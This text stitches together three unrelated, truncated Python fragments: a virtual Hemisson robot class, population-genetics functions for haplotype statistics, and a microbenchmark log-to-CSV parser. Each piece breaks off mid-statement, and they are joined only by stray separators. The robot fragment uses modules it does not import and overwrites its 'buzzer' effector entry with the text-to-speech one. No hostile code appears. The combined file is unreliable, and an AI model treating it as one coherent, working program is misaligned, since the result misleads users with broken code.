import Fusion.Core.Gluon as Gluon
import Fusion.Core.vRobot as vRobot
import Fusion.Core.vRobotThreaded as vRobotThreaded
import Fusion.Gui.GuiTypes as gt
import Fusion.Gui.GuiUtils as gut
import Fusion.Gui.GuiDlgSerConn as GuiDlgSerConn
import Fusion.Gui.GuiWinShell as GuiWinShell
import Fusion.Gui.GuiDlgAbout as GuiDlgAbout
import Fusion.Gui.GuiDlgMsgBox as msgbox
import Fusion.Hemisson.Cmd.HemiCmdBase as HemiBase
import Fusion.Hemisson.Cmd.HemiCmdLinCam as HemiLinCam
import Fusion.Hemisson.Cmd.HemiCmdTts as HemiTts
import Fusion.Hemisson.Cmd.HemiCmdUss as HemiUss
import Fusion.Hemisson.Cmd.HemiCmdAll as HemiCmdAll
import Fusion.Hemisson.Shells.HemiFullShell as HemiCmdShell
import Fusion.Hemisson.Robots.HemiValues as hvals
import Fusion.Hemisson.Robots.HemiIniDD as HemiIniDD
import Fusion.Hemisson.Gui.GuiDlgHemiOpt as GuiDlgHemiOpt
import Fusion.Hemisson.Gui.GuiDlgHemiCalIrLed as GuiDlgHemiCalIrLed
import Fusion.Hemisson.Gui.GuiDlgHemiModLinCam as GuiDlgHemiModLinCam
import Fusion.Hemisson.Gui.GuiDlgHemiModTts as GuiDlgHemiModTts
import Fusion.Hemisson.Gui.GuiDlgHemiModUss as GuiDlgHemiModUss
import Fusion.Hemisson.Gui.GuiWinHemiVizLinCam as GuiWinHemiVizLinCam
import Fusion.Hemisson.Gui.GuiWinHemiVizTts as GuiWinHemiVizTts
import Fusion.Hemisson.Gui.GuiWinHemiVizUss as GuiWinHemiVizUss
#-------------------------------------------------------------------------------
# Global Data
#-------------------------------------------------------------------------------
twopi = 2.0 * math.pi
# sensor converted value, raw value indices
CVTVAL = 0
RAWVAL = 1
#-------------------------------------------------------------------------------
# CLASS: vHemisson
#-------------------------------------------------------------------------------
class vHemisson(vRobotThreaded.vRobotThreaded):
""" Virtual Hemisson Robot Class. """
#--
def __init__(self, client=None, debuglevel=0, debugfout=None):
""" Initialize vHemisson instance.
Parameters:
client - Gluon client
debuglevel - none to all [0, 5] (default: none)
debugfout - opened debug output file (default: stdout)
"""
# base class
vRobotThreaded.vRobotThreaded.__init__(self,
serverId=self.HasName(), client=client,
debuglevel=debuglevel, debugfout=debugfout)
#--
def vRobotInit(self):
""" One-time vRobot initialization during object instantiation. """
# hemisson serial commands
self.mCmd = HemiCmdAll.HemiCmdAll(dbgobj=self.mDbg)
self.mCommIsUp = self.mCmd.IsOpen()
# attached module scan list
self.mModScan = {}
self.mTtsHasChanged = False # work around TTS module bug
# hemisson gui initializations
self.GuiInit()
# common threaded robot initialization (includes ini initialization)
vRobotThreaded.vRobotThreaded.vRobotInit(self)
# add menu bar
self.GSSetServerMenuBarList(self.mMenuBarList)
# add tool bar
self.GSSetServerToolBarList(self.mToolBarList)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# vHemisson Attribute Member Functions
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#--
def IsType(self):
""" Returns the Hemisson robot type.
Return Value:
The Hemisson robot MIME type string.
"""
return hvals.HemiMimeType
#--
def HasName(self):
""" Returns the short vHemisson name(s) string.
Return Value:
The robot name(s) string which may include either or both
the vRobot and physical robot names.
"""
return 'vHemisson'
#--
def IsVersion(self):
""" Returns the vHemisson version(s) string.
Return Value:
The vRobot version(s) string.
"""
return '1.1'
#--
def IsRobotVersion(self):
""" Returns the Hemisson robot version(s) string.
Return Value:
Returns version string if connected.
Else returns 'unknown'.
"""
ver = None
if self.mCommIsUp:
ver = self.mCmd.CmdGetVersion()
if ver:
m = re.match('(HemiOS).*(1\.[5-9][0-9]-RN[e-z])', ver)
if m:
return m.group(2)
else:
self.GSReportErrorStatus("Unsupported Hemisson OS: %s" % repr(ver))
return ver
return 'unknown'
#--
def HasDesc(self):
""" Returns a short description of this vRobot.
Return Value:
Multi-line description string.
"""
sDesc = """\
Hemisson robot with attached Hemisson modules.
Manufactured by K-Team of Switzerland."""
return sDesc
#--
def HasSensorTypes(self):
""" Returns the dictionary of the sensors and their corresponding
properties that are available and supported by this vRobot.
The dictionary is keyed by 'sensorId', which is vRobot unique.
Return Value:
Dictionary of sensor id's and properties in the format:
{sensorId:{'mimetype':<type>...}, ... }
"""
sensorDict = {}
# derived time 'sensor'
sensorDict['time_stamp'] = {
'mimetype': hvals.HemiSensorMimeTypeTime,
'units': 's'
}
sensorDict['dt'] = {
'mimetype': hvals.HemiSensorMimeTypeTime,
'units': 's'
}
# proximity sensors
angrange = math.radians(HemiBase.HemiIrSensorAngRange)
n = 0
for irsensor in HemiBase.HemiIrSensorOrder:
id = 'prox_' + irsensor
zeta = math.radians(HemiBase.HemiIrSensorAngle[n])
sensorDict[id] = {
'mimetype': hvals.HemiSensorMimeTypeProximity,
'zeta': zeta,
'angrange':angrange,
'range': [HemiBase.HemiIrSensorValMin, HemiBase.HemiIrSensorValMax],
'rawunits': 'adc-10bit',
'units': 'mm'
}
n += 1
# ambient sensors
angrange = math.radians(HemiBase.HemiIrSensorAngRange)
n = 0
for irsensor in HemiBase.HemiIrSensorOrder:
id = 'amb_' + irsensor
zeta = math.radians(HemiBase.HemiIrSensorAngle[n])
sensorDict[id] = {
'mimetype': hvals.HemiSensorMimeTypeAmbient,
'zeta': zeta,
'angrange':angrange,
'range': [HemiBase.HemiIrSensorValMin, HemiBase.HemiIrSensorValMax],
'rawunits': 'adc-10bit',
'units': 'mm'
}
n += 1
# speedometers
sensorDict['speedometer_left'] = {
'mimetype': hvals.HemiSensorMimeTypeSpeedometer,
'zeta': math.radians(90),
'range': [HemiBase.HemiSpeedBackwardMax, HemiBase.HemiSpeedForwardMax],
'resolution': 1,
'rawunits': 'dc',
'units': 'unitless'
}
sensorDict['speedometer_right'] = {
'mimetype': hvals.HemiSensorMimeTypeSpeedometer,
'zeta': math.radians(270),
'range': [HemiBase.HemiSpeedBackwardMax, HemiBase.HemiSpeedForwardMax],
'resolution': 1,
'rawunits': 'dc',
'units': 'unitless'
}
sensorDict['pathspeed'] = {
'mimetype': hvals.HemiSensorMimeTypeSpeedometer,
'units': 'unitless'
}
# linear camera
sensorDict['linear_camera'] = {
'mimetype': hvals.HemiSensorMimeTypeLinCam,
'zeta': math.radians(0.0),
'angrange':math.radians(120.0),
'lines': 1,
'width': HemiLinCam.LinCamNumPixels,
'range': [0, 255],
'resolution': 1,
'units': 'gray-level'
}
# ultrasonic sensor
sensorDict['uss'] = {
'mimetype': hvals.HemiSensorMimeTypeUss,
'zeta': math.radians(0.0),
'angrange':math.radians(HemiUss.UssAngRange),
'echoes': HemiUss.UssEchoMaxNum,
'range': [30.0, 6000.0],
'resolution': 43.0,
'units': 'mm'
}
return sensorDict
#--
def HasEffectorTypes(self):
""" Returns the dictionary of the effectors and their corresponding
properties that are available and supported by this vRobot.
The dictionary is keyed by 'effectorId', which is vRobot unique.
Return Value:
Dictionary of effector id's and properties in the format:
{effectorId:{'mimetype':<type>...}, ... }
"""
effectorDict = {}
# motors
effectorDict['motor_left'] = {
'mimetype': hvals.HemiEffectorMimeTypeWheelMotor,
'zeta': math.radians(90),
'resolution': 1,
'range': [HemiBase.HemiSpeedBackwardMax, HemiBase.HemiSpeedForwardMax],
'units': 'unitless'
}
effectorDict['motor_right'] = {
'mimetype': hvals.HemiEffectorMimeTypeWheelMotor,
'zeta': math.radians(270),
'resolution': 1,
'range': [HemiBase.HemiSpeedBackwardMax, HemiBase.HemiSpeedForwardMax],
'units': 'unitless'
}
# LEDs
effectorDict['led0'] = {
'mimetype': hvals.HemiEffectorMimeTypeLed,
'color': 'amber',
'range': [0, 1],
'units': 'off/on'
}
effectorDict['led1'] = {
'mimetype': hvals.HemiEffectorMimeTypeLed,
'color': 'amber',
'range': [0, 1],
'units': 'off/on'
}
# buzzer
effectorDict['buzzer'] = {
'mimetype': hvals.HemiEffectorMimeTypeBuzzer,
'range': [0, 1],
'units': 'off/on'
}
# text-to-speech
effectorDict['buzzer'] = {
'mimetype': hvals.HemiEffectorMimeTypeTts,
'range': [1, 72],
'units': 'ascii-chars'
}
return effectorDict
#--
def HasPhysicalProperties(self):
""" Returns the dictionary of Hemisson physical properties.
Return Value:
Dictionary of physical properties in the format:
{property:<val>, ... }
"""
return {
'diameter': {'val': HemiBase.HemiBaseDiameter, 'units': 'mm'},
'baseweight': {'val': HemiBase.HemiBaseWeight, 'units': 'g'},
'wheelbase': {'val': HemiBase.HemiWheelBase, 'units': 'mm'},
}
#--
def HasBellumGoalControls(self):
""" Returns the maximal list of goal controls (kwGoals) supported
by vHemisson.
Return Value:
List of goal controls.
"""
return ['speed_left', 'speed_right']
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# vHemisson Ini (Re)Initialization Members Functions
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#--
def IniInit(self):
""" Initialize from parsed 'ini' configuration. """
self.mIniDD = HemiIniDD.GetIniDD()
ini = self.GSGetIni()
# load all non-existing ini entries with defaults
for section,sdata in self.mIniDD.items():
optdict = sdata[1]
for option,odata in optdict.items():
if ini.IniGet(section, option) == ini.NullObj:
ini.IniSet(section, option, odata[0])
# load vHemisson run-time options
self.IniInitOpt()
# load vHemisson connection | |
shape (n_variants, n_haplotypes)
Haplotype array.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
step : int, optional
The number of variants between start positions of windows. If not
given, defaults to the window size, i.e., non-overlapping windows.
Returns
-------
hd : ndarray, float, shape (n_windows,)
Haplotype diversity.
"""
hd = moving_statistic(values=h, statistic=haplotype_diversity, size=size,
start=start, stop=stop, step=step)
return hd
def garud_h(h):
"""Compute the H1, H12, H123 and H2/H1 statistics for detecting signatures
of soft sweeps, as defined in Garud et al. (2015).
Parameters
----------
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
Returns
-------
h1 : float
H1 statistic (sum of squares of haplotype frequencies).
h12 : float
H12 statistic (sum of squares of haplotype frequencies, combining
the two most common haplotypes into a single frequency).
h123 : float
H123 statistic (sum of squares of haplotype frequencies, combining
the three most common haplotypes into a single frequency).
h2_h1 : float
H2/H1 statistic, indicating the "softness" of a sweep.
"""
# check inputs
h = HaplotypeArray(h, copy=False)
# compute haplotype frequencies
f = h.distinct_frequencies()
# compute H1
h1 = np.sum(f**2)
# compute H12
h12 = np.sum(f[:2])**2 + np.sum(f[2:]**2)
# compute H123
h123 = np.sum(f[:3])**2 + np.sum(f[3:]**2)
# compute H2/H1
h2 = h1 - f[0]**2
h2_h1 = h2 / h1
return h1, h12, h123, h2_h1
def moving_garud_h(h, size, start=0, stop=None, step=None):
"""Compute the H1, H12, H123 and H2/H1 statistics for detecting signatures
of soft sweeps, as defined in Garud et al. (2015), in moving windows,
Parameters
----------
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
step : int, optional
The number of variants between start positions of windows. If not
given, defaults to the window size, i.e., non-overlapping windows.
Returns
-------
h1 : ndarray, float, shape (n_windows,)
H1 statistics (sum of squares of haplotype frequencies).
h12 : ndarray, float, shape (n_windows,)
H12 statistics (sum of squares of haplotype frequencies, combining
the two most common haplotypes into a single frequency).
h123 : ndarray, float, shape (n_windows,)
H123 statistics (sum of squares of haplotype frequencies, combining
the three most common haplotypes into a single frequency).
h2_h1 : ndarray, float, shape (n_windows,)
H2/H1 statistics, indicating the "softness" of a sweep.
"""
gh = moving_statistic(values=h, statistic=garud_h, size=size, start=start,
stop=stop, step=step)
h1 = gh[:, 0]
h12 = gh[:, 1]
h123 = gh[:, 2]
h2_h1 = gh[:, 3]
return h1, h12, h123, h2_h1
def plot_haplotype_frequencies(h, palette='Paired', singleton_color='w',
ax=None):
"""Plot haplotype frequencies.
Parameters
----------
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
palette : string, optional
A Seaborn palette name.
singleton_color : string, optional
Color to paint singleton haplotypes.
ax : axes, optional
The axes on which to draw. If not provided, a new figure will be
created.
Returns
-------
ax : axes
"""
import matplotlib.pyplot as plt
import seaborn as sns
# check inputs
h = HaplotypeArray(h, copy=False)
# setup figure
if ax is None:
width = plt.rcParams['figure.figsize'][0]
height = width / 10
fig, ax = plt.subplots(figsize=(width, height))
sns.despine(ax=ax, left=True)
# count distinct haplotypes
hc = h.distinct_counts()
# setup palette
n_colors = np.count_nonzero(hc > 1)
palette = sns.color_palette(palette, n_colors)
# paint frequencies
x1 = 0
for i, c in enumerate(hc):
x2 = x1 + c
if c > 1:
color = palette[i]
else:
color = singleton_color
ax.axvspan(x1, x2, color=color)
x1 = x2
# tidy up
ax.set_xlim(0, h.shape[1])
ax.set_yticks([])
return ax
def moving_hfs_rank(h, size, start=0, stop=None):
"""Helper function for plotting haplotype frequencies in moving windows.
Parameters
----------
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
Returns
-------
hr : ndarray, int, shape (n_windows, n_haplotypes)
Haplotype rank array.
"""
# determine windows
windows = np.asarray(list(index_windows(h, size=size, start=start,
stop=stop, step=None)))
# setup output
hr = np.zeros((windows.shape[0], h.shape[1]), dtype='i4')
# iterate over windows
for i, (window_start, window_stop) in enumerate(windows):
# extract haplotypes for the current window
hw = h[window_start:window_stop]
# count haplotypes
hc = hw.distinct_counts()
# ensure sorted descending
hc.sort()
hc = hc[::-1]
# compute ranks for non-singleton haplotypes
cp = 0
for j, c in enumerate(hc):
if c > 1:
hr[i, cp:cp+c] = j+1
cp += c
return hr
def plot_moving_haplotype_frequencies(pos, h, size, start=0, stop=None, n=None,
palette='Paired', singleton_color='w',
ax=None):
"""Plot haplotype frequencies in moving windows over the genome.
Parameters
----------
pos : array_like, int, shape (n_items,)
Variant positions, using 1-based coordinates, in ascending order.
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
n : int, optional
Color only the `n` most frequent haplotypes (by default, all
non-singleton haplotypes are colored).
palette : string, optional
A Seaborn palette name.
singleton_color : string, optional
Color to paint singleton haplotypes.
ax : axes, optional
The axes on which to draw. If not provided, a new figure will be
created.
Returns
-------
ax : axes
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
# setup figure
if ax is None:
fig, ax = plt.subplots()
# compute haplotype frequencies
# N.B., here we use a haplotype rank data structure to enable the use of
# pcolormesh() which is a lot faster than any other type of plotting
# function
hr = moving_hfs_rank(h, size=size, start=start, stop=stop)
# truncate to n most common haplotypes
if n:
hr[hr > n] = 0
# compute window start and stop positions
windows = moving_statistic(pos, statistic=lambda v: (v[0], v[-1]),
size=size, start=start, stop=stop)
# create color map
colors = [singleton_color] + sns.color_palette(palette, n_colors=hr.max())
cmap = mpl.colors.ListedColormap(colors)
# draw colors
x = np.append(windows[:, 0], windows[-1, -1])
y = np.arange(h.shape[1]+1)
ax.pcolormesh(x, y, hr.T, cmap=cmap)
# tidy up
ax.set_xlim(windows[0, 0], windows[-1, -1])
ax.set_ylim(0, h.shape[1])
ax.set_ylabel('haplotype count')
ax.set_xlabel('position (bp)')
return ax
def moving_delta_tajima_d(ac1, ac2, size, start=0, stop=None, step=None):
"""Compute the difference in Tajima's D between two populations in
moving windows.
Parameters
----------
ac1 : array_like, int, shape (n_variants, n_alleles)
Allele counts array for the first population.
ac2 : array_like, int, shape (n_variants, n_alleles)
Allele counts array for the second population.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
step : int, optional
The number of variants between start positions of windows. If not
given, defaults to the window size, i.e., non-overlapping windows.
Returns
-------
delta_d : ndarray, float, shape (n_windows,)
Standardized delta Tajima's D.
See Also
--------
allel.stats.diversity.moving_tajima_d
"""
d1 = moving_tajima_d(ac1, size=size, start=start, stop=stop, step=step)
d2 = moving_tajima_d(ac2, size=size, start=start, stop=stop, step=step)
delta = d1 - d2
delta_z = (delta - np.mean(delta)) / np.std(delta)
return delta_z
def make_similar_sized_bins(x, n):
"""Utility function to create a set of bins over the range of values in `x`
such that each bin contains roughly the same number of values.
Parameters
----------
x : array_like
The values to be binned.
n : int
The number of bins to create.
Returns
-------
bins : ndarray
An array of bin edges.
Notes
-----
The actual number of bins returned may be less than `n` if `x` contains
integer values and any single value is represented more than len(x)//n
times.
"""
# copy and sort the array
y = np.array(x).flatten()
y.sort()
# setup bins
bins = [y[0]]
# determine step size
step = len(y) // n
# add bin edges
for i in range(step, len(y), step):
# get value at this index
v | |
#!/usr/bin/env python3
# encoding: utf-8
# This script parse microbench logs and generate .csv for each workload
import logging
import pandas as pd
import re
import os
import argparse
import datetime
import statistics
def get_max_num_app():
return 10
def get_YEAR():
return datetime.date.today().year
def is_fsp(fstype):
return 'fsp' in fstype
def get_syncop_num():
return 4
def bench_has_fg_sync(job):
job_list = ['ADPS', 'ADSS']
return job in job_list
def filter_listdir_dir(job, cur_dir_list):
job_list = ['SaMP', 'SaMS', 'LsMP', 'LsMS']
result_list = []
if job in job_list:
for name in cur_dir_list:
cur_name = name.split('/')[-1]
if 'listdir' in cur_name:
result_list.append(name)
return result_list
else:
return cur_dir_list
def get_default_benchmarks():
benchmarks = [
'RMPR',
'RMSR',
'RDPR',
'RDSR',
'RMPS',
'RMSS',
'RDPS',
'RDSS',
'WMPS',
'WMSS',
'AMPS',
'AMSS',
'WMPR',
'WMSR',
'WDPS',
'WDPR',
'WDSS',
'WDSR',
'ADPS',
'ADSS',
'S1MP',
'S1MS',
'SaMP',
'SaMS',
'LsMP',
'LsMS',
'CMP',
'CMS',
'UMP',
'UMS',
'RMP',
'RMS',
]
return benchmarks
def get_bench_job_title(job_name):
titles = {
'RMPR': 'RandRead-Mem-P',
'RMSR': 'RandRead-Mem-S',
'RDPR': 'RandRead-Disk-P',
'RDSR': 'RandRead-Disk-S',
'RMPS': 'SeqRead-Mem-P',
'RMSS': 'SeqRead-Mem-S',
'RDPS': 'SeqRead-Disk-P',
'RDSS': 'SeqRead-Disk-S',
'WMPS': 'SeqWrite-Mem-P',
'WMSS': 'SeqWrite-Mem-S',
'AMPS': 'Append-Mem-P',
'AMSS': 'Append-Mem-S',
'WMPR': 'RandWrite-Mem-P',
'WMSR': 'RandWrite-Mem-S',
'WDPS': 'SeqWRite-Disk-P',
'WDPR': 'RandWrite-Disk-P',
'WDSS': 'SeqWrite-Disk-S',
'WDSR': 'RandWrite-Disk-S',
'ADPS': 'Append-Disk-P',
'ADSS': 'Append-Disk-S',
'S1MP': 'Stat1-Mem-P',
'S1MS': 'Stat1-Mem-S',
'SaMP': 'StatAll-Mem-P',
'SaMS': 'StatAll-Mem-S',
'LsMP': 'Listdir-Mem-P',
'LsMS': 'Listdir-Mem-S',
'CMP': 'Create-Mem-P',
'CMS': 'Create-Mem-S',
'UMP': 'Unlink-Mem-P',
'UMS': 'Unlink-Mem-S',
'RMP': 'Rename-Mem-P',
'RMS': 'Rename-Mem-S',
}
return titles[job_name]
def get_dir_name_list_match_pattern(dir_name, reg_str):
pattern = re.compile(reg_str)
match_list = []
logging.debug('==> try match {} {}'.format(dir_name, reg_str))
assert (os.path.exists(dir_name))
for name in os.listdir(dir_name):
if pattern.match(name):
match_list.append('{}/{}'.format(dir_name, name))
return match_list
def process_fsp_out(out_name):
row_col_name_list = [
'firstNs', 'lastNs', 'intervalNs', 'bytes', 'numop', 'iops', 'bw'
]
row_list = []
with open(out_name) as f:
cur_row_dict = None
wid = None
for line in f:
line = line.strip()
items = line.split()
if 'wid:' in line:
if wid is None:
wid = int(items[-2].split(':')[1])
continue
if '===> stats ===>' in line:
if cur_row_dict is not None:
row_list.append(
[cur_row_dict[k] for k in row_col_name_list])
cur_row_dict = {n: 0 for n in row_col_name_list}
cur_row_dict = {n: 0 for n in row_col_name_list}
if 'iops:' in line:
bw_item = items[-1]
iops_item = items[-2]
cur_row_dict['bw'] = float(bw_item.split(':')[1])
cur_row_dict['iops'] = float(iops_item.split(':')[1])
continue
if 'firstNs:' in line:
cur_row_dict['numop'] = int((items[-1]).split(':')[1])
cur_row_dict['bytes'] = int((items[-2]).split(':')[1])
cur_row_dict['lastNs'] = float((items[-4]).split(':')[1])
cur_row_dict['firstNs'] = float((items[-5]).split(':')[1])
cur_row_dict['intervalNs'] = float((items[-3]).split(':')[1])
continue
if 'stats' not in line:
continue
# add the last row
row_list.append([cur_row_dict[k] for k in row_col_name_list])
df = pd.DataFrame(row_list, columns=row_col_name_list)
return df
def process_bench_log(log_name):
row_list = []
row_col_list = [
'size', 'numop', 'iops', 'ltc_stddev', 'bw', 'avg_ltc', 'med_ltc',
'ltc99', 'ltc999'
]
with open(log_name) as f:
cur_row_dict = None
for line in f:
line = line.strip()
items = line.split()
if 'Values:' in line:
if cur_row_dict is not None:
row_list.append(
[cur_row_dict[k] for k in cur_row_dict.keys()])
cur_row_dict = {n: 0 for n in row_col_list}
cur_size = int(items[1])
cur_row_dict['size'] = cur_size
if 'Entries:' in line:
cur_numop = int(items[1])
cur_row_dict['numop'] = cur_numop
if 'micros/op' in line:
assert ('micros/op' in items[3])
cur_microsop = float(items[2])
cur_iops = 1e6 / cur_microsop
cur_row_dict['iops'] = cur_iops
if 'MB/s' in line:
cur_bw = float(items[4])
cur_row_dict['bw'] = cur_bw
else:
cur_row_dict['bw'] = 0
if 'Average:' in line:
assert ('Average' in items[2])
cur_avg_ltc = float(items[3])
cur_ltc_stddev = float(items[5])
cur_row_dict['avg_ltc'] = cur_avg_ltc
cur_row_dict['ltc_stddev'] = cur_ltc_stddev
if 'Median:' in line:
assert ('Median' in items[2])
cur_med_ltc = float(items[3])
cur_row_dict['med_ltc'] = cur_med_ltc
if '%' in line:
pct_item = items[6]
pct = float(pct_item[:-1])
if pct >= 98.9999999 and cur_row_dict['ltc99'] == 0:
cur_row_dict['ltc99'] = float(items[2])
if pct >= 99.8999999 and cur_row_dict['ltc999'] == 0:
cur_row_dict['ltc999'] = float(items[2])
row_list.append([cur_row_dict[k] for k in cur_row_dict.keys()])
df = pd.DataFrame(row_list, columns=row_col_list)
return row_list, row_col_list, df
def process_fsp_log_cpu(fname, sample_k=None, cal_mean_sec_range=None):
per_worker_series_dict = {}
first_nano = None
per_worker_idx = {}
with open(fname) as f:
for line in f:
line = line.strip()
if '[KPLoadStatsSummary]' not in line:
continue
if 'invalidateAppShmByName' in line:
break
if 'BlkDevSpdk' in line:
continue
if '[warning]' in line:
continue
if 'FsProc.cc' in line:
continue
if 'cpu_ut:' in line:
items = line.split()
wid_item = items[1]
nano_item = items[2]
utilization_item = items[-3]
wid = int(wid_item[len('wid:'):])
nano = int(nano_item[len('real_nano:'):])
if first_nano is None:
first_nano = nano
utilization = float(utilization_item[len('cpu_ut:'):])
if wid not in per_worker_series_dict:
per_worker_series_dict[wid] = ([], [])
per_worker_idx[wid] = 0
if sample_k is not None and per_worker_idx[wid] % sample_k != 0:
per_worker_idx[wid] += 1
continue
cur_sec = (nano - first_nano) * 1e-9
if cal_mean_sec_range is not None and cur_sec > cal_mean_sec_range:
break
per_worker_series_dict[wid][0].append(
(nano - first_nano) * 1e-9)
per_worker_series_dict[wid][1].append(utilization)
per_worker_idx[wid] += 1
if cal_mean_sec_range is not None:
num_worker = len(per_worker_series_dict)
per_worker_avg = {}
for wid, wid_ut_tp in per_worker_series_dict.items():
per_worker_avg[wid] = statistics.mean(
wid_ut_tp[1]) if len(wid_ut_tp[1]) != 0 else 0
total_ut = sum(list(per_worker_avg.values()))
mean_ut = total_ut / num_worker
return mean_ut, total_ut, num_worker
else:
return per_worker_series_dict
def merge_rows_from_apps(row_ll, df_list, cur_row_col_list, num_app,
size_list):
"""
merge the row_list generated from each App's benchmark log
"""
rt_dict = {}
for i in range(len(size_list)):
for j in range(num_app):
cur_app_size_row = row_ll[j][i]
cur_sz = size_list[i]
if cur_sz not in rt_dict:
rt_dict[cur_sz] = {}
for k in range(len(cur_row_col_list)):
cur_col_key = cur_row_col_list[k]
# if cur_col_key == 'size':
# continue
if cur_col_key not in rt_dict[cur_sz]:
rt_dict[cur_sz][cur_col_key] = []
rt_dict[cur_sz][cur_col_key].append(cur_app_size_row[k])
def from_row_dict_to_row(row_dict, cur_sz):
cur_row = [0 for i in range(len(cur_row_col_list))]
for k, v in row_dict.items():
assert (len(v) == num_app)
if k == 'size':
cur_row[cur_row_col_list.index('size')] = cur_sz
elif k == 'numop':
cur_row[cur_row_col_list.index(k)] = sum(v)
elif k == 'iops':
cur_row[cur_row_col_list.index(k)] = sum(v)
elif k == 'bw':
cur_row[cur_row_col_list.index(k)] = sum(v)
elif k == 'avg_ltc':
cur_row[cur_row_col_list.index(k)] = statistics.mean(v)
else:
# latency we use median (p99, med)
cur_row[cur_row_col_list.index(k)] = statistics.median(v)
return cur_row
row_list = [from_row_dict_to_row(rt_dict[sz], sz) for sz in size_list]
df = pd.DataFrame(row_list, columns=cur_row_col_list)
return df
def process_one_expr_dir(dir_name,
num_app,
num_fsp_worker,
is_fsp=True,
cpu_ut=False,
sz=None):
if sz is not None:
bench_log_names = [
f'{dir_name}/bench_log_{sz}_{i}' for i in range(num_app)
]
else:
bench_log_names = [f'{dir_name}/bench_log_{i}' for i in range(num_app)]
cpu_ut_out = None
row_ll = []
df_list = []
for bench_log_name in bench_log_names:
cur_row_list, cur_row_colname_list, cur_df = process_bench_log(
bench_log_name)
row_ll.append(cur_row_list)
df_list.append(cur_df)
app_summary_df = merge_rows_from_apps(row_ll, df_list,
cur_row_colname_list, num_app,
list(cur_df['size']))
if is_fsp:
fsp_out_df = None
for cur_size in sorted(list(cur_df['size'])):
wid_list = range(num_fsp_worker)
worker_out_names = [
f'{dir_name}/fsp_out_size{cur_size}/worker-{wid}-logger.out'
for wid in wid_list
]
for i in range(len(wid_list)):
worker_out_name = worker_out_names[i]
if not os.path.exists(worker_out_name):
continue
wid = wid_list[i]
cur_df = process_fsp_out(worker_out_name)
cur_df['size'] = int(cur_size)
cur_df['wid'] = int(wid)
if fsp_out_df is None:
fsp_out_df = cur_df
else:
fsp_out_df = pd.concat([cur_df, fsp_out_df])
# display(fsp_out_df)
if cpu_ut:
if sz is not None:
fsp_log_name = f'{dir_name}/fsp_log_{sz}'
else:
fsp_log_name = f'{dir_name}/fsp_log'
mean_ut, total_ut, num_worker = process_fsp_log_cpu(
fsp_log_name, cal_mean_sec_range=1.5)
cpu_ut_out = mean_ut
else:
fsp_out_df = None
return app_summary_df, fsp_out_df, cpu_ut_out
def gen_csv_for_dir(fstype, dirname, rno, cpu_ut, jobs, sz_list):
if jobs is None:
jobs = get_default_benchmarks()
else:
jobs = jobs.split(',')
if sz_list is None:
sz_list = [None]
else:
sz_list = sz_list.split(',')
fs_prefix = fstype
if fs_prefix.endswith("nj"):
fs_prefix = fs_prefix[:-2]
app_num_list = range(1, get_max_num_app() + 1)
for job in jobs:
for sz in sz_list:
cur_expr_dir = f"{dirname}/{fs_prefix}_{job}_run_{rno}"
logging.info(f'process {cur_expr_dir}')
app_out_df_list = []
for app_num in app_num_list:
if bench_has_fg_sync(job):
app_reg_str = r'log_{}_[a-z|1]+_app_{}_sync-{}$'.format(
fs_prefix, app_num, get_syncop_num())
else:
app_reg_str = r'log_{}_[a-z|1]+_app_{}$'.format(
fs_prefix, app_num)
tmp_list = get_dir_name_list_match_pattern(
cur_expr_dir, app_reg_str)
assert (len(tmp_list) == 1)
cur_app_dir = tmp_list[0]
logging.info(f'===> process app dir -- {cur_app_dir}')
date_str = f'log{get_YEAR()}'
dname_list = [
l for l in os.listdir(cur_app_dir) if date_str in l
]
assert len(dname_list) == 1
date_dir_name = dname_list[0]
assert (date_str in date_dir_name)
num_worker_list = [app_num]
for num_worker in num_worker_list:
cur_reg = r'.*_isFsp-{}_clearPc-True_pinCpu-True-numFsWk-[0-9]|10$'.format(
is_fsp(fstype), num_worker)
cur_target_expr_dir_list = get_dir_name_list_match_pattern(
'{}/{}'.format(cur_app_dir, date_dir_name), cur_reg)
cur_target_expr_dir_list = filter_listdir_dir(
job, cur_target_expr_dir_list)
if len(cur_target_expr_dir_list) != 1:
logging.warn("More than one candidate path detected!")
logging.warn(f"cur_reg: {cur_reg}")
logging.warn(
f"cur_target_expr_dir_list: {cur_target_expr_dir_list}"
)
cur_target_expr_dir_list = [
d for d in cur_target_expr_dir_list
if d.endswith(f"numFsWk-{app_num}")
]
logging.warn(f"Pick => {cur_target_expr_dir_list}")
assert (len(cur_target_expr_dir_list) == 1)
cur_target_expr_dir = cur_target_expr_dir_list[0]
app_out_df, fsp_out_df, cpu_ut_mean = process_one_expr_dir(
cur_target_expr_dir,
app_num,
num_worker,
is_fsp=True,
cpu_ut=cpu_ut,
sz=sz)
# add some fields
app_out_df['num_app'] = app_num
app_out_df['num_fs_wk'] = num_worker
app_out_df['fs_type'] = fstype
if cpu_ut:
app_out_df['cpu_ut'] = cpu_ut_mean
if fsp_out_df is not None:
fsp_out_df['num_app'] = app_num
fsp_out_df['num_fs_wk'] = num_worker
fsp_out_df['fs_type'] = fstype
app_out_df_list.append(app_out_df)
cur_df = pd.concat(app_out_df_list)
if sz is None:
csv_filename = f'{dirname}/{job}.csv'
else:
csv_filename = f'{dirname}/{job}_{sz}.csv'
cur_df.to_csv(csv_filename, index=False)
def main(args, loglevel):
logging.basicConfig(format="%(levelname)s: %(message)s", level=loglevel)
gen_csv_for_dir(args.fs, args.dir, args.rno, args.cpu_ut, args.jobs,
args.sz)
def parse_cmd_args():
parser = argparse.ArgumentParser(
